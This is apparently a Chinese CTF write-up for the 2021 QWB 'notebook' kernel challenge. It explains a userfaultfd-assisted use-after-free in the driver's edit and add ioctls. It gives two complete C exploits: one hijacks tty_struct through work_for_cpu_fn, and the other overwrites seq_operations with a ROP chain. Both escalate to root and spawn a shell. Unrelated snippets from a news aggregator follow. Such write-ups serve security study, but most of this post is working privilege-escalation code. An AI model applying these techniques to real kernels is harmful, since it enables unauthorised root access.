【userfaultfd】2021强网杯notebook

news/2025/1/7 21:41:58/

程序分析

老规矩,看下启动脚本

开启了 smep、smap、kaslr 保护,当然 kvm64 默认开启 kpti 保护

文件系统初始化脚本

#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/ptsmount -t proc proc /proc
mount -t sysfs sysfs /sysecho 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrictifup eth0 > /dev/null 2>/dev/nullinsmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
echo "Welcome to QWB!"#sh
setsid cttyhack setuidgid 1000 sh
#setsid cttyhack setuidgid 0 shumount /proc
umount /syspoweroff -d 1 -n -f

一眼看到驱动模块 netobook.ko

mynote_ioctl 函数 

该函数实现了堆块的增删改的功能(果然什么都逃不过屌丝菜单题的命运bushi) 简单说一下漏洞点

在 noteedit 函数中,会使用 krealloc 函数重新申请一个堆块,所以如果我们传入的新的 size 为0 或者比原来的大,则会将原来的堆块释放掉。

但是 noteedit 函数中存在一个问题,那就是其并没有直接将 krealloc 返回的堆块指针赋值给 notebook[idx]->ptr ,而是先把它赋值给了 v7,然后再用 copy_from_user 复制数据,最后再经过一些检查再将 v7 的值赋值到 notebook 中。当然这里最大的问题是上的是读锁,这就意味着其他拿读锁的函数可以跟这个函数并行,这也为我们后面的利用提供了可能。

mynote_read / mynote_write 函数

 我们有读写堆块的能力,但是有大小限制。

漏洞利用

在 mynote_ioctl 函数中,当我们传入 newsize=0时(你也可以传入更大的值) 我们知道了一个逻辑:

1、先修改 size = newsize

2、释放原来的堆块(申请新的堆块,这里我们传入newsize=0,所以不会申请新的堆块)

3、调用 copy_from_user 复制数据

4、将新的指针赋值给 notebook[idx]->ptr

那这里很明显我们可以在第 3 步使用 userfaultfd 将其卡住,此时 notebook[idx]->ptr 还没有改变,但是其已经被释放了,所以这里就存在一个 UAF。

这里我们选择 tty_struct 去打,程序给了读写的能力,但是有 size 的检查,并且在第一步 size 已经被修改为了 newsize=0,所以这里检查过不了(有人说将newsize传一个大的值,但是这里检查的是 notebook[idx]->ptr 这个堆块的实际大小和 size 的大小关系,所以你还是通过不了检查)

那怎么办呢?

但是注意到 noteadd 函数:

其拿的是读锁,所以当 noteedit 用 userfaultfd 卡住时,其也能执行,但是这个很好的是,这个函数是先修改的 notebook[idx]->size、然后在用 copy_from_user 复制数据,然后再给 notebook[idx]->ptr 申请一个新的堆块,简而言之就是:

1、修改 notebook[idx]->size 为我们输入的 size

2、使用 copy_from_user 复制数据

3、kmalloc(size) 给 notebook[idx]->ptr 

那么我们就可以利用这个函数去修复在 noteedit 中被破坏的 size,即用 userfaultfd 卡在第 2 步。

当然这里由于开启了 smap 保护,使用 tty_struct 的 ops 表也不能直接在用户空间伪造,但是题目直接给了一个 notegift 函数可以读出堆块的地址,所以直接把 ops 表伪造在一个堆块上就 ok 了。

当然如果题目没有给这个函数的话,可以考虑用 seq_operations 去打。 

最后劫持 tty_struct 后直接用 work_for_cpu_fn,exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>#define PTM_UNIX98_OPS 0xffffffff81e8e440
#define PTY_UNIX98_OPS 0xffffffff81e8e320
#define INIT_CRED 0xffffffff8225c940
#define COMMIT_CREDS 0xffffffff810a9b40
#define WORK_FOR_CPU_FN 0xffffffff8109eb90
#define PREPARE_KERNEL_CRED 0xffffffff810a9ef0void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(5);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf("  %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");}printf("   ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}int fd;
struct note {size_t idx;size_t size;char* buf;
};void add(size_t idx, size_t size, char* buf)
{struct note n = { .idx = idx, .size = size, .buf = buf };ioctl(fd, 0x100, &n);
}void dele(size_t idx)
{struct note n = { .idx = idx };ioctl(fd, 0x200, &n);
}void edit(size_t idx, size_t size, char* buf)
{struct note n = { .idx = idx, .size = size, .buf = buf };ioctl(fd, 0x300, &n);
}void gift(char* buf)
{struct note n = { .buf = buf };ioctl(fd, 0x64, &n);
}void register_userfaultfd(void* uffd_buf, pthread_t pthread_moniter, void* handler)
{int uffd;struct uffdio_api uffdio_api;struct uffdio_register uffdio_register;uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);if (uffd == -1) err_exit("syscall for userfaultfd ERROR in register_userfaultfd func");uffdio_api.api = UFFD_API;uffdio_api.features = 0;if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) err_exit("ioctl for UFFDIO_API ERROR");uffdio_register.range.start = (unsigned long long)uffd_buf;uffdio_register.range.len = 0x1000;uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) err_exit("ioctl for UFFDIO_REGISTER ERROR");int res = pthread_create(&pthread_moniter, NULL, handler, uffd);if (res == -1) err_exit("pthread_create ERROR in register_userfaultfd func");
}char buf[0x30];
void handler(void* args)
{int uffd = (int)args;struct uffd_msg msg;struct uffdio_copy uffdio_copy;for (;;){struct pollfd pollfd;pollfd.fd = uffd;pollfd.events = POLLIN;int res = poll(&pollfd, 1, -1);if (res == -1) err_exit("ERROR on poll");int n = read(uffd, &msg, sizeof(msg));if (n == 0) err_exit("EOF on read uffd");if (n == -1) err_exit("ERROR on read uffd");sleep(100);puts("userfault over");if (msg.event != UFFD_EVENT_PAGEFAULT) err_exit("No correct EVENT");uffdio_copy.src = buf;uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(0x1000 - 1);uffdio_copy.len = 0x20;uffdio_copy.mode = 0;uffdio_copy.copy = 0;if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) err_exit("ERROR in UFFDIO_COPY");}
}sem_t sem_edit, sem_add;void evil_edit(void* args)
{sem_wait(&sem_edit);info("evil_edit for construct UAF");edit(0, 0, args);
}void evil_add(void* args)
{sem_wait(&sem_add);info("evil_add for fix the size");add(0, 0x60, args);
}int main(int argc, char** argv, char** env)
{bind_core(0);size_t buf[0x300];size_t tty_struct[0x300];size_t fake_ops[0x100];size_t fake_ops_addr;char* uffd_buf;int tty_fd;size_t kernel_offset;pthread_t moniter, pt_edit, pt_add;sem_init(&sem_edit, 0, 0);sem_init(&sem_add, 0, 0);fd = open("/dev/notebook", O_RDWR);add(0, 0x20, buf);edit(0, 0x2e0, buf);uffd_buf = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);register_userfaultfd(uffd_buf, moniter, handler);pthread_create(&pt_edit, NULL, evil_edit, uffd_buf);pthread_create(&pt_add, NULL, evil_add, uffd_buf);sem_post(&sem_edit);sleep(2);sem_post(&sem_add);sleep(2);tty_fd = open("/dev/ptmx", O_RDWR);read(fd, tty_struct, 0);//read(fd, buf, 0);binary_dump("tty_struct", tty_struct, 0x60);if (*(int*)tty_struct != 0x5401) err_exit("No alloc tty_struct by UAF");kernel_offset = 0;if ((tty_struct[3]&0xfff) == (PTM_UNIX98_OPS&0xfff)) puts("PTM_UNIX98_OPS"), kernel_offset = tty_struct[3] - PTM_UNIX98_OPS;else puts("PTY_UNIX98_OPS"), kernel_offset = tty_struct[3] - PTY_UNIX98_OPS;hexx("kernel_offset", kernel_offset);add(1, 0x20, buf);edit(1, 0x100, buf);gift(buf);fake_ops_addr = buf[2];binary_dump("object addr", buf, 0x20);hexx("fake_ops_addr", fake_ops_addr);memcpy(buf, tty_struct, 0x60);buf[3] = fake_ops_addr;buf[4] = COMMIT_CREDS + kernel_offset;buf[5] = INIT_CRED + kernel_offset;fake_ops[12] = WORK_FOR_CPU_FN + kernel_offset;binary_dump("fake_tty_struct", buf, 0x60);write(fd, buf, 0);binary_dump("fake_ops", fake_ops, 0x70);write(fd, fake_ops, 1);ioctl(tty_fd, 233, 233);write(fd, tty_struct, 0);pthread_cancel(pt_edit);pthread_cancel(pt_add);hexx("UID", getuid());system("/bin/sh");return 0;
}

 但是这里提权好像不是很稳定,最后 userfaultfd 卡的时间到了后,会有个 bug

希望有佬可以解释一些最后面出现的问题 

当然就算题目没有给 notegitf 这个泄漏 object 地址的功能,我们也可以通过 seq_operations 直接打,exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>#define SINGLE_START 0xffffffff8128c230
size_t pop_rdi = 0xffffffff81007115; // pop rdi ; ret
size_t add_rsp_xx = 0xFFFFFFFF8127CDB2l;
size_t swapgs_kpti = 0xFFFFFFFF81A00931;
size_t init_cred = 0xffffffff8225c940;
size_t commit_creds = 0xffffffff810a9b40;
size_t prepare_kernel_cred = 0xffffffff810a9ef0;void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(5);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf("  %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");}printf("   ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}int fd;
struct note {size_t idx;size_t size;char* buf;
};void add(size_t idx, size_t size, char* buf)
{struct note n = { .idx = idx, .size = size, .buf = buf };ioctl(fd, 0x100, &n);
}void dele(size_t idx)
{struct note n = { .idx = idx };ioctl(fd, 0x200, &n);
}void edit(size_t idx, size_t size, char* buf)
{struct note n = { .idx = idx, .size = size, .buf = buf };ioctl(fd, 0x300, &n);
}void gift(char* buf)
{struct note n = { .buf = buf };ioctl(fd, 0x64, &n);
}void register_userfaultfd(void* uffd_buf, pthread_t pthread_moniter, void* handler)
{int uffd;struct uffdio_api uffdio_api;struct uffdio_register uffdio_register;uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);if (uffd == -1) err_exit("syscall for userfaultfd ERROR in register_userfaultfd func");uffdio_api.api = UFFD_API;uffdio_api.features = 0;if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) err_exit("ioctl for UFFDIO_API ERROR");uffdio_register.range.start = (unsigned long long)uffd_buf;uffdio_register.range.len = 0x1000;uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) err_exit("ioctl for UFFDIO_REGISTER ERROR");int res = pthread_create(&pthread_moniter, NULL, handler, uffd);if (res == -1) err_exit("pthread_create ERROR in register_userfaultfd func");
}char buf[0x30];
void handler(void* args)
{int uffd = (int)args;struct uffd_msg msg;struct uffdio_copy uffdio_copy;for (;;){struct pollfd pollfd;pollfd.fd = uffd;pollfd.events = POLLIN;int res = poll(&pollfd, 1, -1);if (res == -1) err_exit("ERROR on poll");int n = read(uffd, &msg, sizeof(msg));if (n == 0) err_exit("EOF on read uffd");if (n == -1) err_exit("ERROR on read uffd");sleep(10000);puts("userfault over");if (msg.event != UFFD_EVENT_PAGEFAULT) err_exit("No correct EVENT");uffdio_copy.src = buf;uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address & ~(0x1000 - 1);uffdio_copy.len = 0x20;uffdio_copy.mode = 0;uffdio_copy.copy = 0;if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) err_exit("ERROR in UFFDIO_COPY");}
}sem_t sem_edit, sem_add;void evil_edit(void* args)
{sem_wait(&sem_edit);info("evil_edit for construct UAF");edit(0, 0, args);
}void evil_add(void* args)
{sem_wait(&sem_add);info("evil_add for fix the size");add(0, 0x20, args);
}int seq_fd;
int main(int argc, char** argv, char** env)
{bind_core(0);size_t buf[0x300];char* uffd_buf;size_t kernel_offset;pthread_t moniter, pt_edit, pt_add;sem_init(&sem_edit, 0, 0);sem_init(&sem_add, 0, 0);fd = open("/dev/notebook", O_RDWR);add(0, 0x20, buf);uffd_buf = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);register_userfaultfd(uffd_buf, moniter, handler);pthread_create(&pt_edit, NULL, evil_edit, uffd_buf);pthread_create(&pt_add, NULL, evil_add, uffd_buf);sem_post(&sem_edit);sleep(2);sem_post(&sem_add);sleep(2);seq_fd = open("/proc/self/stat", O_RDONLY);if (seq_fd < 0) err_exit("Failed to open /proc/self/stat");read(fd, buf, 0);binary_dump("seq_operations", buf, 0x20);kernel_offset = buf[0] - SINGLE_START;hexx("kernel_offset", kernel_offset);buf[0] = add_rsp_xx + kernel_offset;hexx("seq_operations->start", buf[0]);write(fd, buf, 0);pop_rdi += kernel_offset;init_cred += kernel_offset;commit_creds += kernel_offset;swapgs_kpti += kernel_offset;asm volatile("mov r15, pop_rdi;""mov r14, init_cred;""mov r13, commit_creds;""mov r12, swapgs_kpti;""mov rbp, 0x55555555;""mov rbx, 0x66666666;""mov r11, 0x77777777;""mov r10, 0x88888888;""mov r9,  0x99999999;""mov r8,  0xaaaaaaaa;""xor rax, rax;""mov rcx, 0xbbbbbbbb;""mov rdx, 8;""mov rsi, buf;""mov rdi, seq_fd;""syscall;");hexx("UID", getuid());system("/bin/sh");return 0;
}

 上面两个脚本都可以成功提权:


http://www.ppmy.cn/news/1135431.html

相关文章

力扣-383.赎金信

Idea 使用一个hashmap 或者一个int数组存储第二次字符串中每一个字符及其出现的次数 遍历第一个字符串&#xff0c;讲出现的重复字符减1&#xff0c;若该字符次数已经为0&#xff0c;则返回false AC Code class Solution { public:bool canConstruct(string ransomNote, strin…

Redis Cluster Gossip Protocol: PING, PONG, MEET

返回目录 PING / PONG / MEET 的发送 过程 计算freshNodes。freshNodes表示在消息中能携带的&#xff0c;在cluster节点字典中的节点总数&#xff0c;但需要减去myself和对端节点&#xff0c;因为myself的信息会存储在消息头中。实际上&#xff0c;并非所有在cluster节点字典…

Vue09 事件的修饰符

Vue中的事件修饰符&#xff1a; 1.prevent&#xff1a;阻止默认事件&#xff08;常用&#xff09;&#xff1b; 2.stop&#xff1a;阻止事件冒泡&#xff08;常用&#xff09;&#xff1b; 3.once&#xff1a;事件只触发一次&#xff08;常用&#xff09;&#xff1b; 4.captur…

大模型RLHF算法更新换代,DeepMind提出自训练离线强化学习框架ReST

文章链接&#xff1a; https://arxiv.org/abs/2308.08998 大模型&#xff08;LLMs&#xff09;爆火的背后&#xff0c;离不开多种不同基础算法技术的支撑&#xff0c;例如基础语言架构Transformer、自回归语言建模、提示学习和指示学习等等。这些技术造就了像GPT-3、PaLM等基座…

Flutter项目安装到Android手机一直显示在assembledebug

问题 Flutter项目安装到Android手机一直显示在assembledebug 原因 网络不好&#xff0c;gradle依赖下载不下来 解决方案 修改如下的文件 gradle-wrapper.properties 使用腾讯提供的gradle镜像下载 distributionUrlhttps://mirrors.cloud.tencent.com/gradle/gradle-7.5…

“文化共传承 艺术润心灵”——江南大学国家艺术基金走向社区

2023年9月26日、28日晚19点&#xff0c;由无锡市文化广电和旅游局主办的2023年无锡市优秀民乐作品巡演在梁溪区、锡山区隆重举办&#xff0c;江南大学“山水清音”民乐团参演其中。 锡山区演出现场 《梅里春早》是由江南大学人文学院音乐系沈雷强教授领衔的国家艺术基金小型剧&…

【redis学习笔记】哨兵节点编排

编写 docker-compose.yml 创建 /root/redis-sentinel/docker-compose.yml , 同时 cd 到 yml 所在⽬录中&#xff1b; 注意: 每个⽬录中只能存在⼀个 docker-compose.yml ⽂件. version: 3.7 services:sentinel1:image: redis:5.0.9container_name: redis-sentinel-1restart: …

桌面自动化工具总结

引言:产品经理提出桌面程序需要自动化的测试,避免繁琐的人肉点击。说干就干。 现有自动化工具是五花八门,我找了两个框架。 这两个框架都是基于微软的UIA 框架,链接地址 https://learn.microsoft.com/en-us/windows/win32/winauto/uiauto-providerportal?source=recommen…